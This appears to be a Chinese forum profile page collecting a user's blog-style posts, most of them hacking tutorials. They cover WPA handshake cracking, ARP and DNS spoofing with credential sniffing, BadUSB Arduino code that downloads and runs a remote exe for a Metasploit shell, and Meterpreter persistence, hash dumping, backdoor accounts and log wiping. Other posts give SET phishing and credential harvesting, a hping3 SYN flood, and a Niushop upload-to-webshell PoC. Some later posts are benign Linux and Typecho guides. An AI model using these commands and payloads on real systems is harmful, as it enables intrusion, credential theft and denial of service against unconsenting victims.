跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. John@ john the ripper是一个快速的密码破解工具,用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如des、md4、md5等。它支持多种不同类型的系统架构,包括unix、linux、windows、dos模式、beos和openvms,主要目的是破解不够牢固的unix/linux系统密码。先将抓到的握手包转变为John的专用格式hcxpcaptool -j 11.john 11.cap这里11.cap就是我们抓到的握手包 载入字典进行破解john -w:/root/zidian/pass.txt --format=wpapsk 11.john其中/root/zidian/pass.txt为我们的字典路径 可以看到,密码已经跑出来了。当然我们也可以用下面命令查看当前的密码 john --show 11.john hashcat同样还是先将cap包转变为hashcat的包 hcxpcaptool -o 22.hccapx hs/handshake_ChinaNetfDtL_80-C7-C5-34-29-9D_2019-03-14T21-51-35.cap进行跑字典 hashcat --quiet -m 2500 22.hccapx /root/zidian/pass.txt --force若提示如下: 一般是虚拟机中kali没有安装显卡驱动造成的,因为hashcat支持用显卡来提高破解速度。只需要安装显卡驱动就行了。如果实在不行,你在windows下安装hashcat即可。 cowpatty先看帮助文档 cowpatty 4.8 - WPA-PSK dictionary attack. <[email protected]> Usage: cowpatty [options] -f Dictionary file -d Hash file (genpmk) -r Packet capture file -s Network SSID (enclose in quotes if SSID includes spaces) -c Check for valid 4-way frames, does not crack -h Print this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exit 所以格式为: cowpatty -f 字典 -r 握手包.cap -s 无线网名称实例: aircrack帮助文档: aircrack-ng -a 2 -w 字典 --bssid 80:C7:C5:34:29:9D 握手包.cap 总结 总的来说,每个软件各有优势也各有缺点。就拿hashcat来说,是破解速度最快的一个,但是需要显卡的支持。没有好显卡还是起不了多大的作用。
  2. arp欺骗首先连接wifi,进入内网 1,查看内网的存活主机命令 fping -asg 192.168.1.0/24也可以用nmap扫描 nmap -T4 -A 192.168.1.0/24(视不同环境而定,假设这里的路由器地址为 192.168.1.1) 也可利用其他工具查看其他主机,方法有很多 2,arp欺骗 命令 arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1上面一句就对192.168.1.2实施了欺骗 ,此时该主机是断网的 3,流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上,让其恢复网络转发命令 echo 1 >/proc/sys/net/ipv4/ip_forward 将参数换为1这时可以启用 wireshark 抓包工具进行抓包 或者直接获取流量包 ettercap -Tq -i wlan0这样被人输入密码后,我们就可以直接看到。 获取图片和浏览的网站 driftnet -i wlan0 urlsnarf -i wlan0dns劫持修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名 开始进行DNS欺骗攻击: ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2// 进行DNS 欺骗后,再次测试:ping www.sina.com.cn ,发现将www.sina.com.cn 解析指向了攻击者主机(192.168.127.208)
  3. 工具介绍ettercapmitmtf3070网卡(大力推荐) ettercap进行中间人攻击替换图片先利用vim新建一个 kali.filter 写入下面代码并保存 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Ran.\n"); }将其转变为二进制文件 etterfilter kali.filter -o kali.ef执行命令 ettercap -T -q -F ig.ef -M ARP /目标ip///效果如下 mitmf操作替换网页中的图片首先在root下创建一个img的文件夹,在文件夹中放入图片。 执行命令 python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --imgrand --img-dir /root/imgPS: 192.168.5.1 为路由器网关 192.168.5.202 为目标。 访问某宝效果如下: 获取某宝登录密码python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 将所有的图片选择180°python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.5.1 --target 192.168.5.202 --upsidedownternet 其他命令可以参考官网,这里不在演示。 嗅探浏览的图片在通过ettercap进行中间人攻击后,我们可以利用driftnet来获取对方浏览的图片。命令如下: driftnet -i waln0防御可以在路由器防火墙中开启arp攻击,来防御中间人攻击。 mitmf安装参考文章: kali安装MITMF Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用,并利用 beef 强大的 hook ...
  4. 准备badusbArduino 下载软件点击下载 运行软件 在工具菜单中 选择,选择badusb的端口和开发版。 注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始键盘通讯 delay(1000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://bbskali.cn/8888.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file);%HOMEPATH%\\windows.exe;"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); } void loop()//循环 { }windows7系统#include <Keyboard.h> void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(500); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2"); delay(1000); Keyboard.println("POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'https://bbskali.cn/8888.exe';$FILE = ' c:\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);"); delay(3000); Keyboard.println("C:\\X.EXE&EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }其他代码传送门 编译上传 成功如下: 配置监听在msf中我们配置参数,插入badusb即可得到shell,需要注意的是,本代码仅支持win10对于win7和xp由于不能直接用powershell下载,所以以上代码不能实现。
  5. 前言去年买的魅族极速版路由器,本是看见有广告过滤的插件,所以才买的,但是用了一段时间发现插件已经不能用了。而且魅族这方面也已经停止了对路由器的更新,打算扔掉换个新的。但是又有点浪费,在看了大神的几篇文章后,成功将魅族路由器刷入了padavad固件。 路由器刷padavad准备网线一根padavad固件ftfp64 (所有文档已打包附件,文章末尾下载即可。) 刷入固件 注意事项1、最好将杀毒软件关掉,有时候tftp32.exe程序可能会被杀毒软件误杀2、如果是win7或以上的系统,工具和固件最好不要放在C盘,防止被UAC等防火墙禁掉3、请确保电脑网卡设置成了10.10.10.3的地址,以前有用户误将宽带拨号的网络标示当成网卡来设置了4、上电后松开按钮的时间不能太晚也不能太早,太晚或太早都会导致TFTP无反应,升级不成功 特别注意:进入救援模式(刷机模式)时务必记住先断开电源(拔掉电源线),之后按住wps按键不放,然后接通电源线,等待4-7秒后松手。 在TFTP出现路由请求接收固件文件成功后,等待3分钟以上,重启路由器即可。 成功后可以登录192.168.123.1(一般是)进入web管理,默认管理账户admin密码admin,wifi密码1234567890。 成功界面 配置某V 可自行搭建Shadowsocks将参数填入配置中,访问某谷可在浏览器中输入地址即可,无需其他软件做代理。 广告屏蔽 固件下载点击下载 提取码:581s 填坑输入后会发现三个口都成了LAN无法设置上网,可在外置设置——端口隔离和 VLAN 过滤中设置如下,即可解决。
  6. 建立持续后门当我们成功获取shell后,再次建立链接显得特别麻烦,那么有什么方法可以解决此问题呢。在前期的教程中,我讲过讲msf的进程转移的其他软件的方法,今天来看看另外的一种方法。 执行命令 run persistence -U -A -i 10 - 8090 -r 192.168.232.194其中 192.168.232.194为kali的ip 我们可以看到,在 C:\WINDOWS\TEMP\IGlPDkq.vbs下生成了一个vbs脚本。并且在注册表中也加入了相应的值,如开机启动。 这样,当对方电脑关机或者重启,我们同样能得到反弹会话。 获取凭证hashdump模块(post)可以从SAM数据库中导出本地用户账号,credential_collector脚本(post/windows/gather/credentials)也可以从目标设备中收集令牌信息。 run post/windows/gather/hashdump 脚本和post模块都需要通过“run”命令执行,数据的输出格式为:用户名:SID:LM哈希:NTLM哈希:::。 运行程序我们还可以使用“execute”命令在目标系统中执行应用程序。这个命令的使用方法如下: execute -f<file> [Options]运行后它将执行file参数所指定的文件。可选参数如下: -H:创建一个隐藏进程 -a:传递给命令的参数 -i:跟进程进行交互 -m:从内存中执行 -t:使用当前伪造的线程令牌运行进程 -s:在给定会话中执行进程 创建一个新账号接下来,我们可以在目标系统中创建一个新的用户账号(getgui脚本,使用-u和-p参数),并给它分配管理员权限(使用),然后将其添加到”远程桌面用户”组中。 run getgui -u kali -p 123456 启用远程桌面rdesktop 目标ip首先,我们需要确保目标Windows设备开启了远程桌面功能(需要开启多个服务),不过我们的getgui脚本可以帮我们搞定。我们可以使用-e参数确保目标设备开启了远程桌面功能(重启之后同样会自动开启): 当我们新添加的用户已经拥有远程桌面权限之后,我们就可以使用这个账号凭证来开启远程桌面会话了。 清除事件日志完成攻击操作之后,千万别忘了“打扫战场”。我们的所有操作都会被记录在目标系统的日志文件之中,因此我们需要在完成攻击之后使用命令clearev命令来清除事件日志: Meterpreter常用命令1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令)background(进程隐藏至后台) sessions(查看已经成功获取的会话,-i 恢复会话) quit(关闭当前会话) shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错) irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互) 2、文件系统命令(与目标文件系统交互,包括查看、上传下载、搜索、编辑)cat(目标系统文件交互) getwd(获取目标机当前工作目录,getlwd本地当前工作工作目录) upload(上传文件或文件夹到目标机 -r 递归) download(从目标机下载文件或文件夹 -r 递归) edit(调用vi编辑器,对目标上的文件进行编辑) search(对目标机的文件进行搜索) 3、网络命令(查看目标网络状况、连接信息,进行端口转发等)ipconfig(获取目标主机上的网络接口信息) portfwd(端口转发:将目标主机开放但不允许访问的端口进行转发) route(显示目标主机路由信息) 4、系统命令(查看目标系统信息、对系统进行基本操作等)ps(查看目标机正在运行的进程信息) migrate(将meterpreter会话进程迁移到另一个进程内存空间) execute(在目标机上执行文件) getpid(当前会话所在进程的pid值) kill(终结指定的pid程序) getuid(获取当前会话用户名) sysinfo(获取系统信息) shutdown(关闭目标主机) 5、用户接口命令screenshot(截获被控主机当前桌面)
  7. 利用nmap怎么扫描已知的漏洞呢? 执行命令: nmap -v --script=smb-vuln-*.nse --script-args=unsafe=1 ip -Pn我们可以看到,当前服务器存在ms08-067和ms17-010漏洞
  8. 首先,准备一个要发送的邮箱文件(一行一个邮箱地址)。 示例文件 email.txt: [email protected] [email protected] [email protected] 启动Social Engineering Toolkit:启动setoolkit 选择1,然后选择5: 选择2,群发。添入email.txt文件路径: 你现在有两个选择,一个使用gmail发送,一个是使用自己的邮件服务器发送。 我使用gmail发送,选择1。 填入你的gmail邮箱地址、密码等等信息。然后按照提示输入邮件主题内容等等。 来自看守所的温馨提示! 自娱自乐即可!请勿恶意攻击!
  9. 本来一直就用的阿里云的服务器,这两天想给网站添加CDN服务,刚开始用的是又拍云,但是效果不是很明显,试了下阿里云的cdn效果杠杠的。可是晚上睡觉的时候,发来短信却说劳资有他们阿里云的二毛钱欠费,mmp后台登录看了下,是cdn产生的费用!在认真看了下,说是先使用后扣费!艹!!! 没办法,看了下,有卖的流量包,于是又买了100GB的流浪包,可是买后又发现居然是全站加速的!日了狗! 打算放弃CDN了!
  10. 一般来说,用户的登录方式有三种: (1)命令行登录(2)ssh登录(3)图形界面登录 <?php echo "hellow"; ?>对于运行级别为5的图形方式用户来说,他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况:当我们看到mingetty的登录界面时,我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login,login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析:如果用户名不是 root,且存在 /etc/nologin 文件,login 将输出 nologin 文件的内容,然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录,如果不存在这个文件,则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制,如果不存在这个文件,则没有其他限制。 点击下载 Default Primary Success Info Warning Danger图形模式与文字模式的切换方式Linux预设提供了六个命令窗口终端机让我们来登录。 默认我们登录的就是第一个窗口,也就是tty1,这个六个窗口分别为tty1,tty2 … tty6,你可以按下Ctrl + Alt + F1 ~ F6 来切换它们。 如果你安装了图形界面,默认情况下是进入图形界面的,此时你就可以按Ctrl + Alt + F1 ~ F6来进入其中一个命令窗口界面。 当你进入命令窗口界面后再返回图形界面只要按下Ctrl + Alt + F7 就回来了。 如果你用的vmware 虚拟机,命令窗口切换的快捷键为 Alt + Space + F1~F6. 如果你在图形界面下请按Alt + Shift + Ctrl + F1~F6 切换至命令窗口。 Linux 关机在linux领域内大多用在服务器上,很少遇到关机的操作。毕竟服务器上跑一个服务是永无止境的,除非特殊情况下,不得已才会关机。 正确的关机流程为:sync > shutdown > reboot > halt 关机指令为:shutdown ,你可以man shutdown 来看一下帮助文档。 例如你可以运行如下命令关机: sync 将数据由内存同步到硬盘中。 shutdown 关机指令,你可以man shutdown 来看一下帮助文档。例如你可以运行如下命令关机: shutdown –h 10 ‘This server will shutdown after 10 mins’ 这个命令告诉大家,计算机将在10分钟后关机,并且会显示在登陆用户的当前屏幕中。 shutdown –h now 立马关机 shutdown –h 20:25 系统会在今天20:25关机 shutdown –h +10 十分钟后关机 shutdown –r now 系统立马重启 shutdown –r +10 系统十分钟后重启 reboot 就是重启,等同于 shutdown –r nowhalt 关闭系统,等同于shutdown –h now 和 poweroff 最后总结一下,不管是重启系统还是关闭系统,首先要运行 sync 命令,把内存中的数据写到磁盘中。 关机的命令有 shutdown –h now halt poweroff 和 init 0 , 重启系统的命令有 shutdown –r now reboot init 6
  11. 一般来说,用户的登录方式有三种: (1)命令行登录(2)ssh登录(3)图形界面登录对于运行级别为5的图形方式用户来说,他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入 KDE、Gnome 等窗口管理器。 而本文主要讲的还是文本方式登录的情况:当我们看到mingetty的登录界面时,我们就可以输入用户名和密码来登录系统了。 Linux 的账号验证程序是 login,login 会接收 mingetty 传来的用户名作为用户名参数。 然后 login 会对用户名进行分析:如果用户名不是 root,且存在 /etc/nologin 文件,login 将输出 nologin 文件的内容,然后退出。 这通常用来系统维护时防止非root用户登录。只有/etc/securetty中登记了的终端才允许 root 用户登录,如果不存在这个文件,则 root 用户可以在任何终端上登录。 /etc/usertty文件用于对用户作出附加访问限制,如果不存在这个文件,则没有其他限制。
  12. 准备神器burp字典一份网站后台系统(以路由器登录后台为列) 启动burp软件我已经共享了,大家可以看这里! 拦截数据我们在后台中随便输入一个账号和密码,并在burp中截取数据。 右键 选择 send to truder 切换到truder界面 在positions界面,点击右边的clear$ 然后选择刚才输入的账号和密码 分别点击Add$ 然后点击 Payloads选项卡点击load载入字典。 在length中我们可以看到,值不同的则为密码。 下载可以去论坛哦!
  13. 终端输入setoolkit启动 依次选择 Social-Engineering Attacks Website Attack Vectors Credential Harvester Attack Method Web Templates 选择所要伪造的钓鱼页面 在局域网的另一台电脑上,在浏览器下输入攻击机的ip地址 会出现google的登陆页面 当我们输入账号和密码,在后台就会得到。
  14. 攻击过程:你使用hping3执行拒绝服务攻击(即DoS)。你隐藏你的a$$(我是指你的源头IP地址)。你的目标机器看到的将是随机性源头IP地址中的源头,而不是你的IP地址(IP伪装)。你的目标机器会在5分钟里面不堪重负,停止响应。ok,我们进行简单的模拟攻击: 先用nmap扫描内网存活主机 nmap -sP 192.168.1.1/24 我们的攻击目标是智能手机。 输入命令hping -S --flood -V IP 开始攻击 我们来看看攻击的效果 ok 这时候 手机已经呈现断网状态 按下ctrl+c关闭,这时候我们看看发送了多少数据 这个数据包很客观的了。 另外就是隐藏IP攻击目标 命令是这样的: hping3 -S -U --flood -V --rand -source IP怎样防止DOS攻击如果是网站,可以让网站接入CDN加速。
  15. Niushop开源商城采用thinkphp5.0+MySQL开发语言开发,完全开源商城系统,可以用于企业,个人建立自己的网上免费商城,支持开源微信商城,开源小程序,开源新零售。下载链接:http://www.niushop.com.cn/download.html Version:单商户 2.2 安装爆破MySQL密码GET /niushop/install.php?action=true&dbserver=127.0.0.1&dbpassword=root2&dbusername=root&dbname=niushop_b2c HTTP/1.1 Host: 127.0.0.1 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Referer: http://127.0.0.1/niushop/install.php?refresh Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: action=db Connection: close 爆破成功返回1,密码错误返回0 getshell 上传图片只做了前端校验,抓包改后缀即可绕过。 对文件内容做了检查,文件大小不能过大或过小,合成马最好放到中间。 请求包截图,删除不必要的参数仍旧能够上传。 所以导致前台getshell PoCimport requests session = requests.Session() paramsGet = {"s":"/wap/upload/photoalbumupload"} paramsPost = {"file_path":"upload/goods/","album_id":"30","type":"1,2,3,4"} paramsMultipart = [('file_upload', ('themin.php', "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x0bIDAT\x08\x99c\xf8\x0f\x04\x00\x09\xfb\x03\xfd\xe3U\xf2\x9c\x00\x00\x00\x00IEND\xaeB`\x82<? php phpinfo(); ?>", 'application/octet-stream'))] headers = {"Accept":"application/json, text/javascript, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0","Referer":"http://127.0.0.1/index.php?s=/admin/goods/addgoods","Connection":"close","Accept-Language":"en","Accept-Encoding":"gzip, deflate"} cookies = {"action":"finish"} response = session.post("http://127.0.0.1/index.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies) print("Status code: %i" % response.status_code) print("Response body: %s" % response.content)
  16. 说明:前几天看到了个很强大的新项目,py12306购票助手,支持分布式,多账号,多任务购票,还带了很方便的Web管理界面,支持各种通知,比如微信,电话语音,邮件等。现在貌似到了抢票的季节了,所以博主就分享一下该工具的手动安装和Docker安装,有需求的可以用下。功能多日期查询余票自动打码下单用户状态恢复电话语音通知多账号、多任务、多线程支持单个任务多站点查询分布式运行Docker支持动态修改配置文件邮件通知Web管理页面微信消息通知 手动安装Github地址:https://github.com/pjialin/py12306 环境要求: Python 3.6以上的版本。 安装Python 3.6sudo apt-get update sudo apt-get install python3.6查看是否安装完成 python3 --version 安装pip3apt-get install python3-pip -y安装完成pip3后我们安装依赖环境 git clone https://github.com/pjialin/py12306 cd py12306 pip3 install -r requirements.txt配置程序复制配置文件 cp env.py.example env.py然后编辑该配置文件,填入你的账号等信息,建议使用FTP工具访问VPS后编辑该文件。 部分配置说明,其它配置就参考配置文件里面的说明,挺详细了 1、自动打码 目前支持免费打码,和若快打码 注:免费打码无法保证持续可用,如失效请手动切换到若快平台,需要先到http://www.ruokuai.com注册一个账号后填写到配置中。 2、语音通知 语音验证码使用的是阿里云API市场上的一个服务商,需要到https://market.aliyun.com/products/57126001/cmapi019902.html 购买后将appcode填写到配置中。 测试程序 目前提供了一些简单的测试,包括用户账号检测,乘客信息检测,车站检测等 开始测试 python3 main.py -t测试通知消息(语音, 邮件) python3 main.py -t -n启动程序 测试无误后,就可以开始启动了,使用命令: python3 main.py 浏览器中输入本机IP:8008访问web页面 购买成功
  17. 最近不少小伙伴在群里面讨论怎样安装输入法,其实在论坛中我之前就发布过这篇教程,今天给大家在总结下。 1. 安装fcitxapt-get install fcitxPS:顺利的话会自动安装成功,如果遇到依赖错误,按提示修复或者输入apt-get -f install修复,但是如果提示“依赖xxx,但是xxx将不会被安装”,这一般是源太旧,建议换个其他的源。 2. 安装fcitx-libs-qtapt-get install fcitx-libs-qt 3.安装搜狗输入法去搜狗输入法官网http://pinyin.sogou.com/linux/ 下载自己系统对应版本的输入法安装包。 3.1 安装搜狗输入法cd ~/下载/也可以文件浏览器在定位到下载目录,右击选择在终端中打开 dpkg -i 下载的sogo安装包文件名 嗯,提示错误,因为是部分依赖还没有安装,我们缺什么安装什么就行了。 或者执行命令apt --fix-broken install 然后,我们重新执行下面命令 dpkg -i sogoupinyin_2.2.0.0108_amd64.deb 可以看到,没有报错。证明已经安装成功。 4.启用搜狗输入法终端中输入: im-config 进入输入法配置,选择确定,然后点击是,在弹出来的输入法选择框中选择fcitx,然后确定 。 注销账号,重新登录,然后右上角有个键盘图标,点击选择【设置】,在左下角点击【+】新增输入法 在弹出窗口中取消“仅显示当前预览”复选框,然后搜索Sogou,找到搜狗输入法,点击OK 打开编辑器,“Ctrl+,”即可切换到搜狗输入法 执行reboot重启 然后ctrl + 空格调用输入法
  18. moji表情随着IOS的普及和微信的支持越来越常见,比如这些比较常见的表情:⭐️ ? ✨ ⚡️ ? ?。所谓Emoji就是一种在Unicode位于\u1F601-\u1F64F区段的字符。这个显然超过了目前常用的UTF-8字符集的编码范围\u0000-\uFFFF。在 MySQL 中,UTF-8只支持最多 3 个字节,而 emoji 是 4 个字节。 Typecho默认不支持emoji表情,其实不是程序的锅,而是由于编码的问题,只需要将默认的数据库编码utf8修改为utf8mb4即可,当然别忘了,utf8mb4编码只有在PHP5.5以后才支持。 简单两步即可让typecho支持emoji 1.修改数据库编码进入PhpMyadmin,选择您的数据库,操作--》整理--》选择utf8mb4_unicode_ci 2.修改数据库表编码直接运行以下sql语句 alter table typecho_comments convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_contents convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_fields convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_metas convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_options convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_relationships convert to character set utf8mb4 collate utf8mb4_unicode_ci; alter table typecho_users convert to character set utf8mb4 collate utf8mb4_unicode_ci; 3.修改数据库配置文件网站根目录数据库配置文件config.inc.php $db->addServer(array ( 'host' => localhost, 'user' => 'youruser', 'password' => 'yourpassword', 'charset' => 'utf8mb4', //修改这一行 'port' => 3306, 'database' => 'yourdatabase'4.大功告成测试一下 :mrgreen: :cool: ⭐️ ? ✨ ⚡️ ? ?
  19. 前言在综合前人的基础上,对typecho邮件评论模板进行了更新,修复了配色方案以及自适应效果。在文章末尾即可下载。代码owner代码 <base target="_blank" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta charset="utf-8"> <style type="text/css"> ::-webkit-scrollbar{ display: none; } </style> <style id="cloudAttachStyle" type="text/css"> #divNeteaseBigAttach, #divNeteaseBigAttach_bak{display:none;} </style> <div class="container" style="max-width:500px;margin:20px auto;background-color:#fff;box-shadow:1px 1px px #888888;border-radius:10px;font-family:-apple-system,BlinkMacSystemFont,&quot;"> <div class="mail-box" style="width:100%;"> <div class="mail-header" style="background:url('https://blog.bbskali.cn/emali.jpg') center center no-repeat;background-size:100% auto;margin:10px 0;width:100%;height:220px;box-sizing:border-box;overflow-y:hidden;"> </div> <div style="width:100%;background:#49BDAD;color:#ffffff;border-radius: 10px 10px 0 0;background-image: -moz-linear-gradient(0deg, rgb(67, 198, 184), rgb(255, 209, 244));background-image: -webkit-linear-gradient(0deg, rgb(67, 198, 184), rgb(255, 209, 244));height: 66px;"> <p style="font-size:15px;word-break:break-all;padding: 23px 32px;margin:0;background-color: hsla(0,0%,100%,.4);border-radius: 10px 10px 0 0;">您的<a style="text-decoration:none;color: #ffffff;" href="https://blog.bbskali.cn"> {siteTitle} </a>上有新的评论啦! </p> </div> <p class="mail-p3" style="border-radius:3px;margin:0;margin-bottom:10px;padding:15px 10px;"> <strong style="display:inline-block;line-height:20px;background-color:#00a7e0;color:#fff;border-radius:4px;padding:5px 10px;height:20px;">{author}</strong>&nbsp;在&nbsp;<strong><a href="{permalink}" style="text-decoration:underline;color:inherit;">{title}</a></strong>&nbsp;新评论: </p> <div style="margin:40px auto;width:95%"> <p>{author} 在您文章《{title}》上发表评论如下,请您检阅:</p> <p style="background: #fafafa repeating-linear-gradient(-45deg,#fff,#fff 1.125rem,transparent 1.125rem,transparent 2.25rem);box-shadow: 0 2px 5px rgba(0, 0, 0, 0.15);margin:20px 0px;padding:15px;border-radius:5px;font-size:14px;color:#555555;">{text}</p> <p class="wrap" style="text-decoration:none"><span class="w260"><img class="ico" width="16" height="16" src="https://blog.bbskali.cn/time.png">:{time}</span><span class="w20"> </span><span class="wauto"><img class="ico" width="18" height="18" src="https://blog.bbskali.cn/ip.png">:{ip}</span></p> <p class="wrap" style="text-decoration:none"><span class="w260"><img class="ico" width="16" height="16" src="https://blog.bbskali.cn/email.png">:{mail}</span><span class="w20"> </span><span class="wauto"><img class="ico" width="21" height="19" src="https://blog.bbskali.cn/start.png">:{status}</span></p> <p><a style="text-decoration:none; color:#12addb" href="{permalink}" target='_blank'>[查看评论]</a>&nbsp;|&nbsp;<a style="text-decoration:none; color:#12addb" href="{manage}" target='_blank'>[管理评论] </a></p> <style type="text/css">a:link{text-decoration:none}a:visited{text-decoration:none}a:hover{text-decoration:none}a:active{text-decoration:none}</style> </div> <p class="mail-footer" style="border-radius:3px;margin:0;padding:15px 20px;text-align:right;"> {siteTitle} 献上诚挚的问候 </p> </div> </div> <style type="text/css"> body{font-size:14px;font-family:arial,verdana,sans-serif;line-height:1.666;padding:0;margin:0;overflow:auto;white-space:normal;word-wrap:break-word;min-height:100px} td, input, button, select, body{font-family:Helvetica, 'Microsoft Yahei', verdana} pre {white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-pre-wrap;white-space:-o-pre-wrap;word-wrap:break-word;width:95%} th,td{font-family:arial,verdana,sans-serif;line-height:1.666} img{ border:0} header,footer,section,aside,article,nav,hgroup,figure,figcaption{display:block} blockquote{margin-right:0px} .wrap span { display: inline-block; font-family:'Century Gothic','Trebuchet MS','Hiragino Sans GB',微软雅黑,'Microsoft Yahei',Tahoma,Helvetica,Arial,'SimSun',sans-serif; font-size: 12px; } .w260{ width: 190px;} .w20{ width: 20px;} .wauto{ width: auto;} .ico{vertical-align:middle; } </style> <style id="ntes_link_color" type="text/css">a,td a{color:#064977}</style> guest代码 <base target="_blank" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <meta charset="utf-8"> <style type="text/css"> ::-webkit-scrollbar{ display: none; } </style> <style id="cloudAttachStyle" type="text/css"> #divNeteaseBigAttach, #divNeteaseBigAttach_bak{display:none;} </style> <div class="container" style="max-width:500px;margin:20px auto;background-color:#fff;box-shadow:1px 1px px #888888;border-radius:10px;font-family:-apple-system,BlinkMacSystemFont,&quot;"> <div class="mail-box" style="width:100%;"> <div class="mail-header" style="background:url('https://blog.bbskali.cn/emali.jpg') center center no-repeat;background-size:100% auto;margin:10px 0;width:100%;height:220px;box-sizing:border-box;overflow-y:hidden;"> </div> <div style="width:100%;background:#49BDAD;color:#ffffff;border-radius: 10px 10px 0 0;background-image: -moz-linear-gradient(0deg, rgb(67, 198, 184), rgb(255, 209, 244));background-image: -webkit-linear-gradient(0deg, rgb(67, 198, 184), rgb(255, 209, 244));height: 66px;"> <p style="font-size:15px;word-break:break-all;padding: 23px 32px;margin:0;background-color: hsla(0,0%,100%,.4);border-radius: 10px 10px 0 0;">您的<a style="text-decoration:none;color: #ffffff;" href="https://blog.bbskali.cn"> {siteTitle} </a>上的评论有回复啦! </p> </div> <p class="mail-p3" style="border-radius:3px;margin:0;margin-bottom:10px;padding:15px 10px;"> <strong style="display:inline-block;line-height:20px;background-color:#ec6149;color:#fff;border-radius:4px;padding:5px 10px;height:20px;">{author_p}</strong>&nbsp;您在&nbsp;<strong><a href="{permalink}" style="text-decoration:underline;color:inherit;">{title}</a></strong>&nbsp;的评论: </p> <div style="margin:40px auto;width:95%"> <p style="background: #fafafa repeating-linear-gradient(-45deg,#fff,#fff 1.125rem,transparent 1.125rem,transparent 2.25rem);box-shadow: 0 2px 5px rgba(0, 0, 0, 0.15);margin:20px 0px;padding:15px;border-radius:5px;font-size:14px;color:#555555;">{text_p}</p> <p class="mail-p3" style="border-radius:3px;margin:0;margin-bottom:10px;padding:15px 10px;"> <strong style="display:inline-block;line-height:20px;background-color:#00a7e0;color:#fff;border-radius:4px;padding:5px 10px;height:20px;">{author}</strong>&nbsp;在&nbsp;<strong><a href="{permalink}" style="text-decoration:underline;color:inherit;">{title}</a></strong>&nbsp;回复你: </p> <p style="background: #fafafa repeating-linear-gradient(-45deg,#fff,#fff 1.125rem,transparent 1.125rem,transparent 2.25rem);box-shadow: 0 2px 5px rgba(0, 0, 0, 0.15);margin:20px 0px;padding:15px;border-radius:5px;font-size:14px;color:#555555;">{text}</p> </div> <p class="mail-footer" style="border-radius:3px;margin:0;padding:15px 20px;text-align:right;"> {siteTitle} 献上诚挚的问候 </p> </div> </div> <style type="text/css"> 